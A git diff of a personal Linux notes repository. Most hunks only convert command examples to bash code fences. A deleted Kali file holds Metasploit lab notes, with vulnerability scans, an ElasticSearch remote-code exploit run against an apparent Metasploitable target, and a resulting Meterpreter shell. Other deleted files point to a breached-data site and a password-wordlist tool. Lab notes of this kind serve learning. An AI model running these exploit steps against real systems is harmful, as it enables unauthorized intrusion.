"Documentation", "data" ] ---- -MySQL, Aurora and the Maria Database work similarly, and mostly with the same commands. - -MySQL requires 160 Megs of disk space. - -The ontological layers go: - -> Database > table > record > field - -The record is a line containing multiple fields. The table contains multiple records. - -## Database: RPGs - -### Table: D&D - -#### Columns: - -| id | name | year | edition | stars | -|:--:|:-------------------|:-----|:--------|:------| -| 1 | Dungeons & Dragons | 1975 | 1 | 1 | -| 2 | Dungeons & Dragons | 1980 | 2 | 1 | -| 3 | Advanced Dungeons & Dragons | 1985 | 1 | 1 | - - -# Getting started - -> sudo apt-get install mysql-server - -You'll be asked for a password. - -Log in with: - -> mysql -u root -p - -The -u requests a user, while -p tells it to prompt for a password. - -List all databases: - -> show databases; - -Make a new database; - -> create database creatures; - -Start work on the new database: - -> use creatures; - -> create table stats (Strength VARCHAR(2), Speed VARCHAR(2), Dexterity(2)); - -This creatures a row called 'stats' within the 'creature'table' with a number of variables, all of type VARCHAR (a variable length character string). - -Now you can insert data (which would normally be provided by a user via php or some-such). - -> insert into stats (Strength,Speed,Dexterity) values (-1,0,+1) - -Now have a look at the info: - -> select * from stats - -The old way to delete info by selection was: - -> delete * from stats where Charisma='0' - -...but now it's: - -> delete from stats where Charisma='0' - -Update a thing: - -> update stats - -> set Speed='-1',Charisma='-2' - -> where Strength=0; - -Leaving out the specifier 'where' means you're updating the entire database. - -Control order with - -> SELECT * FROM stats ORDER BY Strength; - -Or for descending order, suffix 'DESC'. - -> select * from stats ORDER by Date DESC; - -# Resources - -Try more at [w3schools](http://www.w3schools.com/sql/sql_groupby.asp). - - diff --git a/data/taskwarrior/task.md b/data/taskwarrior/task.md index 8becdc4..01eee0a 100644 --- a/data/taskwarrior/task.md +++ b/data/taskwarrior/task.md @@ -5,95 +5,137 @@ tags: [ "Documentation", "Organization" ] Set up the configuration file: -> task +```bash +task +``` Add a task: -> task add *update linux* +```bash +task add update linux +``` See which task is next: -> task next +```bash +task next +``` Note the id number. Mark a task as started: -> task start *1* +```bash +task start 1 +``` Once finished: -> task *1 done* +```bash +task 1 done +``` # Projects Add a project: -> task add project:*house buy potted plant* -> task add proj:*house.repair buy screwdriver* -> task add proj:*house.repair buy shelf brackets* -3 task add pro:*house.paint buy white paint* -> task add pro:*house.paint buy red paint* -> task add pro:*house.paint buy black paint* -> task add pro:*house.paint buy brushes* +```bash +task add project:house buy potted plant +task add proj:house.repair buy screwdriver +task add proj:house.repair buy shelf brackets +task add pro:house.paint buy white paint +task add pro:house.paint buy red paint +task add pro:house.paint buy black paint +task add pro:house.paint buy brushes +``` ## Summary -> task pro:house sum +```bash +task pro:house sum +``` -> task burndown.daily pro:house +```bash +task burndown.daily pro:house +``` The summaries will show how fast a project is being completed, and when you can expect it to finish at the present rate. # Tags -> task add +buy toothbrush +```bash +task add +buy toothbrush +``` You can then see only tasks which involve buying something with: -> task +buy +```bash +task +buy +``` # Contexts Set three contexts by their tags: -> task context define *work +sa or +hr* +```bash +task context define work +sa or +hr +``` -> task context define *study +ed or +void or +rat* +```bash +task context define study +ed or +void or +rat +``` -> task context define *home -sa -hr -ed -void -rat* +```bash +task context define home -sa -hr -ed -void -rat +``` Change to the first context. -> task context *work* +```bash +task context work +``` Then stop. -> task context none +```bash +task context none +``` # Review View list of tasks completed in the last week: -> task end.after:today-1wk completed +```bash +task end.after:today-1wk completed +``` # User Defined Attributes Make a UDA 'size'. -> task config uda.size.type string +```bash +task config uda.size.type string +``` -> task config uda.size.label Size +```bash +task config uda.size.label Size +``` -> task config uda.size.values large,medium,small +```bash +task config uda.size.values large,medium,small +``` -> uda.size.default=medium +```bash +uda.size.default=medium +``` # Tricks This command shows tasks I'm most interested in: -> task next +ACTIVE or +OVERDUE or due:today or scheduled:today or pri:H +```bash +task next +ACTIVE or +OVERDUE or due:today or scheduled:today or pri:H +``` The command is long, so `alias` is your friend. diff --git a/data/taskwarrior/timew.md b/data/taskwarrior/timew.md index cbaedd5..aa1e4d1 100644 --- a/data/taskwarrior/timew.md +++ b/data/taskwarrior/timew.md @@ -6,76 +6,88 @@ tags: [ "Documentation", "Data" ] Try: -> timew summary :yesterday +```bash +timew summary :yesterday +``` You can also use :week, :lastweek, :month, :quarter, :year, or a range such as: -> timew summary today to tomorrow - -> timew today - tomorrow - -> 2018-10-15T06:00 - 2018-10-17T06:00 +```bash +timew summary today to tomorrow +timew today - tomorrow +2018-10-15T06:00 - 2018-10-17T06:00 +``` Each of these can gain with the :ids tag. # Basics -> timew start - -> timew stop - -> timew continue - -> timew summary - -> timew tags +```bash +timew start +timew stop +timew continue +timew summary +timew tags +``` And add ids with: -> timew summary :ids - - -> timew track 10am - 1pm timewarrior - -> timew track 1pm for 2h walk +```bash +timew summary :ids +timew track 10am - 1pm timewarrior +timew track 1pm for 2h walk +``` # Adjusting Timewarrior First get ids. -> timew summary :ids +```bash +timew summary :ids +``` Then if we're looking at task @2: -> timew move @2 12:00 +```bash +timew move @2 12:00 +timew lengthen @2 3mins +``` -> timew lengthen @2 3mins - -> time shorten @2 40mins +```bash +time shorten @2 40mins +``` # Forgetting -> timew start 1h ago @4 +```bash +timew start 1h ago @4 +``` Or if your action actually had a break: -> timew split @8 +```bash +timew split @8 +``` Or maybe not? -> timew join @4 @8 - -> timew @8 delete +```bash +timew join @4 @8 +timew @8 delete +``` Start at previous time -> timew start 3pm 'Read chapter 12' - -> timew start 90mins ago 'Read chapter 12' +```bash +timew start 3pm 'Read chapter 12' +timew start 90mins ago 'Read chapter 12' +``` Cancel currently tracked time. -> timew cancel +```bash +timew cancel +``` # Backdated tracking @@ -129,25 +141,29 @@ task end.after:today-1wk completed Replace -`os.system('timew start ' + combined + ' :yes')` +> os.system('timew start ' + combined + ' :yes') with: -`os.system('timew start ' + combined.decode() + ' :yes')` +> os.system('timew start ' + combined.decode() + ' :yes') and -`os.system('timew stop ' + combined + ' :yes')` +> os.system('timew stop ' + combined + ' :yes') with: -`os.system('timew stop ' + combined.decode() + ' :yes')` +> os.system('timew stop ' + combined.decode() + ' :yes') # Fixing Errors -> curl -O https://taskwarrior.org/download/timew-dbcorrection.py +```bash +curl -O https://taskwarrior.org/download/timew-dbcorrection.py +``` -> python timew-dbcorrections.py +```bash +python timew-dbcorrections.py +``` # Setup diff --git a/data/w3m.md b/data/w3m.md index 8235f7f..2e022ad 100644 --- a/data/w3m.md +++ b/data/w3m.md @@ -4,7 +4,9 @@ tags: [ "Documentation", "browsers" ] --- Open a search tab: -> w3m ddg.gg +```bash +w3m ddg.gg +``` then enter to start typing. diff --git a/distros/arch/autologin.md b/distros/arch/autologin.md index 29980db..d937aec 100644 --- a/distros/arch/autologin.md +++ b/distros/arch/autologin.md @@ -7,7 +7,9 @@ tags: [ "Documentation", "Distros", "Arch" ] Edit `/etc/systemd/system/getty@tty1.service.d/override.conf` by typing: -> sudo systemctl edit getty@tty1 +```bash +sudo systemctl edit getty@tty1 +``` The put in the following, changing `[ USER ]` to your username. diff --git a/distros/arch/basic-install.md b/distros/arch/basic-install.md index 07d4a98..36ca460 100644 --- a/distros/arch/basic-install.md +++ b/distros/arch/basic-install.md @@ -4,94 +4,150 @@ tags: [ "Documentation", "arch" ] --- Keyboard layout changed. -> ls /usr/share/kbd/keymaps/**/*.map.gz +```bash +ls /usr/share/kbd/keymaps/**/*.map.gz +``` -> loadkeys uk.map.gz +```bash +loadkeys uk.map.gz +``` Check if boot mode is UEFI -> ls /sys/firmware/efi/efivars +```bash +ls /sys/firmware/efi/efivars +``` Without efivars, the system must boot with BIOS. # Check network's up -> ping archlinux.org +```bash +ping archlinux.org +``` Set system clock properly -> timedatectl set-ntp true +```bash +timedatectl set-ntp true +``` Check disks -> lsblk +```bash +lsblk +``` Make partition -> parted -s /dev/sda mklabel gpt +```bash +parted -s /dev/sda mklabel gpt +``` -> parted -s /dev/sda mklabel msdos +```bash +parted -s /dev/sda mklabel msdos +``` -> parted -s /dev/sda mkpart primary ext4 512 100% +```bash +parted -s /dev/sda mkpart primary ext4 512 100% +``` -> parted -s /dev/sda set 1 boot on +```bash +parted -s /dev/sda set 1 boot on +``` -> mkfs.ext4 /dev/sda1 +```bash +mkfs.ext4 /dev/sda1 +``` Use pacstrap to get the base install. -> mount /dev/sda1 /mnt/ +```bash +mount /dev/sda1 /mnt/ +``` -> pacstrap /mnt base base-devel vim linux linux-firmware +```bash +pacstrap /mnt base base-devel vim linux linux-firmware +``` Make fstab notes for new system. -> genfstab -U /mnt >> /mnt/etc/fstab +```bash +genfstab -U /mnt >> /mnt/etc/fstab +``` -> arch-chroot /mnt +```bash +arch-chroot /mnt +``` -> echo 'en_GB.UTF-8' > /etc/default/locale +```bash +echo 'en_GB.UTF-8' > /etc/default/locale +``` -> pacman -Sy networkmanager grub +```bash +pacman -Sy networkmanager grub +``` For legacy: -> grub-install --target=i386-pc /dev/sda +```bash +grub-install --target=i386-pc /dev/sda +``` For EFI: -> sudo pacman -S efibootmgr +```bash +sudo pacman -S efibootmgr +``` -> mkdir /boot/efi +```bash +mkdir /boot/efi +``` -> grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB --remmovable +```bash +grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB --remmovable +``` -> grub-mkconfig -o /boot/grub/grub.cfg +```bash +grub-mkconfig -o /boot/grub/grub.cfg +``` set local time -> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime +```bash +ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime +``` Find the desired locale's and uncomment them. -> vi /etc/locale.gen +```bash +vi /etc/locale.gen +``` -> locale-gen +```bash +locale-gen +``` Make your keyboard changes permenent with: -> vi /etc/vconsole.conf +```bash +vi /etc/vconsole.conf +``` Then set: `KEYMAP=uk.map.gz` unsure about this bit - is this name just for the loadkeys function? Make a hostname -> echo pc > /etc/hostname +```bash +echo pc > /etc/hostname +``` Set hostnames for network, or at least your own. -> vi /etc/hosts +```bash +vi /etc/hosts +``` # This should have the following, at least: @@ -103,17 +159,27 @@ If the system has a permanent IP address, it should be used instead of localhost Ping some sites to make sure the network's working -> passwd +```bash +passwd +``` -> exit +```bash +exit +``` -> umount -R /mnt +```bash +umount -R /mnt +``` Remove that awful beep sound: -> rmmod pcspkr +```bash +rmmod pcspkr +``` ...and make the change permanent: -> sudo echo "blacklist pcspkr" >> /etc/modprobe.d/nobeep.conf +```bash +sudo echo "blacklist pcspkr" >> /etc/modprobe.d/nobeep.conf +``` diff --git a/distros/arch/encrypted.md b/distros/arch/encrypted.md deleted file mode 100644 index 9a8d5f1..0000000 --- a/distros/arch/encrypted.md +++ /dev/null @@ -1,98 +0,0 @@ ---- -title: "encrypted" -tags: [ "Documentation", "distros" ] ---- -> # taken from https://0x00sec.org/t/arch-linux-with-lvm-on-luks-dm-crypt-disk-encryption-installation-guide-legacy-bios-system/1479 - -> # if you need wifi - -> wifi-menu - -> timedatectl set-ntp true - -> fdisk -l - -> parted /dev/sda - -> (parted) mklabel msdos - -> (parted) mkpart primary ext2 1MB 512MB - -> (parted) mkpart primary ext4 512MB 100% - -> (parted) print - -> (parted) set 1 boot on - -> (parted) quit - -> fdisk -l - -> cryptsetup luksFormat /dev/sda2 - -> # make a name. Here I use "crypt". - - cryptsetup open /dev/sda2 crypt - -> pvcreate /dev/mapper/crypt - -> # now a group name - "usb" - -> vgcreate usb /dev/mapper/crypt - - -> lvcreate -L 8GB usb -n swap -> lvcreaate -L 30G usb -n root -> lvcreate -l 100%FREE usb -n home - -> mkfs.ext4 /dev/mapper/usb-home - mkfs.ext4 /dev/mapper/usb-root -> mkswap /dev/mapper/usb-swap - -> mkfs.ext2 /dev/sda1 - -> mount /dev/mapper/usb-root /mnt - mkdir /mnt/home -> mount /dev/mapper/usb-home /mnt/home - mkdir /mnt/boot -> mount /dev/sda1 /mnt/boot - swapon /dev/mapper/usb-swap - -pacstrap -i /mnt base base-devel efibootmgr grub - -genfstab -U /mnt >> /mnt/etc/fstab - -arch-chroot /mnt - - ############ new root ############# - - ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime - - # uncomment en_GT.UTF-8 -> vi /etc/locale.gen - -> locale-gen - -> # add `LANG=en_GB.UTF-8` to /etc/locale.conf - -> vi /etc/locale.conf - -> echo crypt > /etc/hostname - -> # make sure keyboard encrypt lvm2 are on the list of HOOKS - -> vi /etc/mkinitcpio.conf - -> grub-install /dev/sda - -> vi /etc/default/grub -edit the GRUB_CMDLINE_LINUX="" - -`GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:usb root=/dev/mapper/usb-root"` - -> grub-mkconfig -o /boot/grub/grub.cfg - -> mkinitcpio -p linux - -> pacman -S wpa_supplicant dialog - diff --git a/distros/arch/fonts.md b/distros/arch/fonts.md index 15b4019..9e99e11 100644 --- a/distros/arch/fonts.md +++ b/distros/arch/fonts.md @@ -6,14 +6,20 @@ tags: [ "Documentation", "distros" ] Update font-cache: -> fc-cache +```bash +fc-cache +``` List fonts: -> fc-list +```bash +fc-list +``` Grab the part of the font name you need for Xresources: -> fc-list | cut -d: -f2 +```bash +fc-list | cut -d: -f2 +``` Add field 3 for styles. diff --git a/distros/arch/gpu.md b/distros/arch/gpu.md index 3851a3e..af74d47 100644 --- a/distros/arch/gpu.md +++ b/distros/arch/gpu.md @@ -13,13 +13,17 @@ Include = /etc/pacman.d/mirrorlist And update: -> sudo pacman -Syu +```bash +sudo pacman -Syu +``` # Step 2: Check Card Manufacturer Check your graphics card type: -> lspci | grep VGA +```bash +lspci | grep VGA +``` # Step 3: Install Drivers @@ -27,23 +31,33 @@ Check your graphics card type: If you see `Nvidia`, then install the intel drivers: -> sudo pacman -S --needed lib32-mesa vulkan-intel lib32-vulkan-intel vulkan-icd-loader lib32-vulkan-icd-loader +```bash +sudo pacman -S --needed lib32-mesa vulkan-intel lib32-vulkan-intel vulkan-icd-loader lib32-vulkan-icd-loader +``` ## Step 3B If you see `Intel`, then install the intel drivers: -> sudo pacman -S --needed lib32-mesa vulkan-intel lib32-vulkan-intel vulkan-icd-loader lib32-vulkan-icd-loader xf86-video-intel +```bash +sudo pacman -S --needed lib32-mesa vulkan-intel lib32-vulkan-intel vulkan-icd-loader lib32-vulkan-icd-loader xf86-video-intel +``` ## Step 3C If you see `AMD`, then check your card support `vulkan`: -> yay -S gpu-viewer +```bash +yay -S gpu-viewer +``` -> vulkaninfo | grep 'VkPhysicalDeviceVulkanMemoryModelFeatures' -A 3 +```bash +vulkaninfo | grep 'VkPhysicalDeviceVulkanMemoryModelFeatures' -A 3 +``` You should see 'true' here. -> sudo pacman -S --needed lib32-mesa vulkan-radeon lib32-vulkan-radeon vulkan-icd-loader lib32-vulkan-icd-loader xf86-video-amdgpu +```bash +sudo pacman -S --needed lib32-mesa vulkan-radeon lib32-vulkan-radeon vulkan-icd-loader lib32-vulkan-icd-loader xf86-video-amdgpu +``` diff --git a/distros/arch/pacman.md b/distros/arch/pacman.md index 89cbe79..2514cee 100644 --- a/distros/arch/pacman.md +++ b/distros/arch/pacman.md @@ -7,11 +7,15 @@ Packages are kept in /var/cache/pacman/pkg. Delete unused old packages with: -> sudo pacman -Sc +```bash +sudo pacman -Sc +``` Signatures are handled by the pacman-key, initially set up with: -> sudo pacman-key --populate archlinux +```bash +sudo pacman-key --populate archlinux +``` And refreshed with: @@ -19,23 +23,33 @@ sudo pacman-key --refresh-keys If you have usigned keys, you can refresh with: -> sudo pacman -Sc +```bash +sudo pacman -Sc +``` or -> sudo pacman -Scc +```bash +sudo pacman -Scc +``` Reset all keys with: -> sudo rm -r /etc/pacmand.d/gnupg/ && sudo pacman-key --init +```bash +sudo rm -r /etc/pacmand.d/gnupg/ && sudo pacman-key --init +``` If you're constantly getting 'everything corrupted, nothing upgraded', try running: -> sudo pacman -S archlinux-keyring +```bash +sudo pacman -S archlinux-keyring +``` List all orphaned packages: -> sudo pacman -Qtdq +```bash +sudo pacman -Qtdq +``` ## Cleaning Config Files diff --git a/distros/debian/apt.md b/distros/debian/apt.md index 4ada012..497033f 100644 --- a/distros/debian/apt.md +++ b/distros/debian/apt.md @@ -8,17 +8,27 @@ tags: [ "Documentation", "distros" ] Messed up a package's configuration files? -> sudo apt-get purge [thing] +```bash +sudo apt-get purge [thing] +``` -> sudo apt autoremove +```bash +sudo apt autoremove +``` Check if you still have related things: -> apt search [thing] +```bash +apt search [thing] +``` -> sudo apt-get install [ thing ] +```bash +sudo apt-get install [ thing ] +``` Still have problems? -> sudo dpgk --force-confmiss -i /var/cache/apt/archives/[thing] +```bash +sudo dpgk --force-confmiss -i /var/cache/apt/archives/[thing] +``` diff --git a/distros/kali/install-kali.sh b/distros/kali/install-kali.sh deleted file mode 100644 index 0ed0168..0000000 --- a/distros/kali/install-kali.sh +++ /dev/null @@ -1,90 +0,0 @@ -cd /usr/share/X11/xkb/symbols/ -cp pc pc.bak -echo "pc backup copied - this isn't tested" >> ~/install.log -sed s/Caps_Lock/Escape/ pc > pc -cd -echo "deb https://dl.bintray.com/hawkeye116477/waterfox-deb release main" | sudo tee -a /etc/apt/sources.list -curl https://bintray.com/user/downloadSubjectPublicKey?username=hawkeye116477 | sudo apt-key add - -sudo apt-get update && sudo apt-get install waterfox - -``` - -echo "deb http://http.kali.org/ /kali main contrib non-free -deb http://http.kali.org/ /wheezy main contrib non-free -deb http://http.kali.org/kali kali-dev main contrib non-free -deb http://http.kali.org/kali kali-dev main/debian-installer -deb-src http://http.kali.org/kali kali-dev main contrib non-free -deb http://http.kali.org/kali kali main contrib non-free -deb http://http.kali.org/kali kali main/debian-installer -deb-src http://http.kali.org/kali kali main contrib non-free -deb http://security.kali.org/kali-security kali/updates main contrib non-free -deb-src http://security.kali.org/kali-security kali/updates main contrib non-free" >> /etc/apt/sources.list - -``` - -setxkbmap gb - -# gksudo firefox -install-global-extension addon-1865-latest.xpi - #install addon with cli -apt-get -y install openvpn -cd /etc/openvpn - - -sudo wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip - -unzip ovpn.zip - - rm ovpn.zip - -sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome - -wget https://github.com/maestrogerardo/i3-gaps-deb/archive/master.zip - -echo "if you don't have openvpn options in your gnome desktop, this just isn't going to work. Get the openvpn manager, called 'openvpn-service-gnome' or some such" >> ~/*log -unzip ma* - -rm ma*zip - -cd i3-g* - -sudo apt -y update;sudo apt -y upgrade - -./i3* - -cd - -mv i3/ .config - -sudo apt install feh compton ranger w3m cmus scrot - -sudo apt install tor - -wget https://github.com/dpayne/cli-visualizer/archive/master.zip - -echo "If vis is playing funny-buggers, enter the install files and input the commands manually. May be an architecture problem as I don't have arm cpu" >> *log - -unzip master.zip - -rm master.zip - -cd cli-vis* - -apt install libfftw3-dev libncursesw5-dev libpulse-dev - -./install.sh - -cd - -mkdir Images;mkdir Images/Wallpapers;mkdir Images/Screenshots - -apt install -y encfs cmatrix cowsay - -mkdir Tools - -cd Tools - -wget https://github.com/Mebus/cupp/archive/master.zip - -unzip master.zip;rm master.zip - -cd diff --git a/distros/kali/metasploit.md b/distros/kali/metasploit.md deleted file mode 100644 index 2c264a1..0000000 --- a/distros/kali/metasploit.md +++ /dev/null @@ -1,128 +0,0 @@ ---- -title: "metasploit" -tags: [ "Documentation", "distros" ] ---- -> service postgresql start - -> systemctl status postgresql - -> msfdb init - -start the metasploit - -> msfconfole - -show exploits - -Examples: - -> info exploit/something - -> search cve:2019 - -## Basic theory - -There are vulnerabilities and payloads. - -Payloads would typically give us a shell on the remote system. Android, Linux and Windows require different shells. - -You can attach via 'reverse' or 'bind'. A 'bind' is best, as the user opens a port, and you connect. Mostly, you have to use 'reverse', which opens a connection to you. - -# Notes for Class - -Victim: - -> nmap -Pn -sV --script=vuln - -> nmap -Pn -sV - -Output: - -``` - -Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining) -Nmap scan report for -Host is up (0.016s latency). -Not shown: 988 filtered ports -PORT STATE SERVICE VERSION -21/tcp open ftp Microsoft ftpd -22/tcp open ssh OpenSSH 7.1 (protocol 2.0) -80/tcp open http Microsoft IIS httpd 7.5 -4848/tcp open appserv-http? -8022/tcp open oa-system? -8080/tcp open http Sun GlassFish Open Source Edition 4.0 -8383/tcp open ssl/m2mservices? -9200/tcp open tcpwrapped -49153/tcp open unknown -49154/tcp open unknown -49159/tcp open unknown -49161/tcp open tcpwrapped -1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : -SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge -SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo -SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\ -SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n"); -MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate) -Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows - -Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . - -``` - -Note this one: - -`9200/tcp open tcpwrapped` - -Apparently that's 'elasticsearch', so in metasploit we can do: - -`search elasticsearch` - -``` - # Name Disclosure Date Rank Check Description - - ---- --------------- ---- ----- ----------- - 0 auxiliary/scanner/elasticsearch/indices_enum normal Yes ElasticSearch Indices Enumeration Utility - 1 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal - 2 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution - 3 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass - 4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution - -``` - -If you want to use 2, `use 2` or `use/multi/ela` then tab out. - -> show options - -> set rhost - -The remote port's already set at this point. - -We've so far done use, rhost, and port. - -> exploit - -``` -[*] Started reverse TCP handler on -[*] Trying to execute arbitrary Java... -[*] Discovering remote OS... -[+] Remote OS is 'Windows Server 2008 R2' -[*] Discovering TEMP path -[+] TEMP path identified: 'C:\Windows\TEMP\' -[*] Sending stage (53845 bytes) to -[*] Meterpreter session 1 opened ( -> at 2019-09-14 15:38:49 +0000 -[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target -``` - -> dir - -# Next Wordpress - - - -Back to normal shell. - -> search wordpress ninja - - -> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload - - diff --git a/distros/kali/webresources b/distros/kali/webresources deleted file mode 100644 index 4a925f2..0000000 --- a/distros/kali/webresources +++ /dev/null @@ -1,8 +0,0 @@ -https://coldwallet.io/ - -https://www.it-vn.com/2019/07/configure-ssh-to-avoid-from-shodan-and.html - -https://wickr.com - -https://weleakinfo.com/ - diff --git a/distros/partition.sh b/distros/partition.sh deleted file mode 100644 index 8a97dc3..0000000 --- a/distros/partition.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -# run as root -[ -z $1 ] && echo set a disk && exit 1 -parted /dev/sd$1 --script -- mklabel msdos -parted /dev/sd$1 --script -- mkpart primary 0 300M -parted /dev/sd$1 --script -- mkpart primary 300M 100% - -mkfs.vfat /dev/sd"$1"1 -mkfs.ext4 /dev/sd"$1"2 diff --git a/distros/redhat/npm.md b/distros/redhat/npm.md deleted file mode 100644 index 45fc935..0000000 --- a/distros/redhat/npm.md +++ /dev/null @@ -1,15 +0,0 @@ ---- -title: "npm" -tags: [ "Documentation", "Distros" ] ---- -package.json is the basic configuration file. - -Everything is per-directory. - -> npm install x - -This'll install x in the current directory. - -> npm init - -> npm install express --save diff --git a/distros/redhat/yum.md b/distros/redhat/yum.md deleted file mode 100644 index d15abf8..0000000 --- a/distros/redhat/yum.md +++ /dev/null @@ -1,18 +0,0 @@ ---- -title: "yum" -tags: [ "Documentation", "Distros" ] ---- -# Overview - -> yum search [package] - -> yum list openssh - -> yum install [package1] [package2] - -> yum check-updates - -> yum update - -> yum remove [package1] [package2] - diff --git a/distros/void/autologin.md b/distros/void/autologin.md index a94aff3..d2b6e8b 100644 --- a/distros/void/autologin.md +++ b/distros/void/autologin.md @@ -5,10 +5,11 @@ tags: [ "Documentation", "Void" ] Make the autologin service: -> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1 - +```bash +cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1 ``` +```sh if [ -x /sbin/agetty -o -x /bin/agetty ]; then # util-linux specific settings if [ "${tty}" = "tty1" ]; then @@ -24,7 +25,7 @@ TERM_NAME=linux Then stick this at the end of the bashrc: -``` +```sh # autologin on tty1 if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then exec startx diff --git a/distros/void/extrace.md b/distros/void/extrace.md index 6142fb4..ff0dd94 100644 --- a/distros/void/extrace.md +++ b/distros/void/extrace.md @@ -4,13 +4,19 @@ tags: [ "Documentation", "Void" ] --- Monitor all processes: -> extrace +```bash +extrace +``` Monitor one process: -> extrace ls +```bash +extrace ls +``` Monitor a script: -> ./script.sh | extrace +```bash +./script.sh | extrace +``` diff --git a/distros/void/sv.md b/distros/void/sv.md index 8a90f18..fe230bd 100644 --- a/distros/void/sv.md +++ b/distros/void/sv.md @@ -6,35 +6,49 @@ tags: [ "Documentation", "Void" ] All possible services are in: -> ls /etc/sv +```bash +ls /etc/sv +``` The computer only uses those in /var/service, so symbolic links are made to start and stop services. -> ls /var/service +```bash +ls /var/service +``` # Start Services Enable the sshd service, so that ssh will work every time you boot up: -> sudo ln -s /etc/sv/sshd /var/service +```bash +sudo ln -s /etc/sv/sshd /var/service +``` Then start the service: -> sudo sv start sshd +```bash +sudo sv start sshd +``` # Stop Services Stop `mpd` with: -> sudo sv stop mpd +```bash +sudo sv stop mpd +``` And stop it automatically loading at startup with: -> sudo rm /var/service/mpd +```bash +sudo rm /var/service/mpd +``` You can also just make a file called 'down': -> sudo touch /var/service/mpd/down +```bash +sudo touch /var/service/mpd/down +``` This means you can start and stop the service without making symbolic links, but mpd will be 'down' when the computer starts. @@ -49,5 +63,7 @@ If unsure, use `#!/bin/bash` as the first line. When Void Linux says `sh`, it m Confirm the shell you'll use: -> ls -l $(which sh) +```bash +ls -l $(which sh) +``` diff --git a/distros/void/void_basics.md b/distros/void/void_basics.md index eb34232..fdb890d 100644 --- a/distros/void/void_basics.md +++ b/distros/void/void_basics.md @@ -6,7 +6,9 @@ tags: [ "Documentation", "Void" ] Update all packages with -> sudo xbps-install -Su +```bash +sudo xbps-install -Su +``` See [xbps](xbps.md) for more. @@ -15,21 +17,29 @@ See [xbps](xbps.md) for more. Void keeps *every* version of everything you install, so you can roll back to them. Remove old packages with: -> sudo xbps-remove -O +```bash +sudo xbps-remove -O +``` # vkpurge Old Void kernels are left on the boot partition. List them with: -> vkpurge list +```bash +vkpurge list +``` Remove one with: -> vkpurge 2.8.2_4 +```bash +vkpurge 2.8.2_4 +``` Remove all but the latest with: -> vkpurge rm all +```bash +vkpurge rm all +``` # Brightness @@ -38,9 +48,10 @@ You can change this number to change the screen brightness. For an easy utility, install `brightnessctl`. -> brightnessctl s 10%- - -> brightnessctl s 10%+ +```bash +brightnessctl s 10%- +brightnessctl s 10%+ +``` # Other Tricks diff --git a/distros/void/xbps.md b/distros/void/xbps.md index 722bee3..2a1765e 100644 --- a/distros/void/xbps.md +++ b/distros/void/xbps.md @@ -6,49 +6,69 @@ tags: [ "Documentation", "Void" ] Look for cowsay in the repository: -> xbps-query --repository --search cowsay +```bash +xbps-query --repository --search cowsay +``` Short version: -> xbps-query -Rs cowsay +```bash +xbps-query -Rs cowsay +``` Search with regex: -> xbps-query --regex -Rs 'cow(s)?\w' +```bash +xbps-query --regex -Rs 'cow(s)?\w' +``` ![xbps searches](/tapes/xbps-query.gif) List what's required for cowsay -> xbps-query -x cowsay +```bash +xbps-query -x cowsay +``` What packages are orphaned (i.e. installed as a dependency for another package, which has since been removed)? -> xbps-query -O +```bash +xbps-query -O +``` Show cowsay's dependencies. -> xbps-query -x cowsay +```bash +xbps-query -x cowsay +``` This shows `perl`. To see what else depends on perl: -> xbps-query -X perl +```bash +xbps-query -X perl +``` List all manually installed software. -> xbps-query -m +```bash +xbps-query -m +``` ## Install Install cowsay -> xbps-install cowsay +```bash +xbps-install cowsay +``` Upgrade current packages. `-R` looks at repositories, `-s` makes a sloppy search (for rough matches). -> xbps-install -Suv +```bash +xbps-install -Suv +``` ![xbps searches](/tapes/xbps-install.gif) @@ -56,15 +76,21 @@ Upgrade current packages. Remove cowsay -> xbps-remove cowsay +```bash +xbps-remove cowsay +``` ...and all dependencies -> xbps-remove -R cowsay +```bash +xbps-remove -R cowsay +``` Remove all orphaned dependencies. -> xbps-remove -o +```bash +xbps-remove -o +``` Show information about cowsay @@ -74,13 +100,19 @@ Show information about cowsay Reinstall cowsay -> xbps-install -f cowsay +```bash +xbps-install -f cowsay +``` Look for broken packages. -> sudo xbps-pkgdb -a +```bash +sudo xbps-pkgdb -a +``` And if you've found any, you might reconfigure all packages forcefully: -> sudo xbps-reconfigure -af +```bash +sudo xbps-reconfigure -af +``` diff --git a/hardware/brightness.md b/hardware/brightness.md index 5115295..c13f430 100644 --- a/hardware/brightness.md +++ b/hardware/brightness.md @@ -3,6 +3,8 @@ title: "brightness" tags: [ "Documentation", "hardware" ] --- # Brightness -/sys/class/backlight/*/brightness +Edit this file: + +> /sys/class/backlight/*/brightness diff --git a/hardware/keyboard/keyboard.md b/hardware/keyboard/keyboard.md index b62328e..fc17ca1 100644 --- 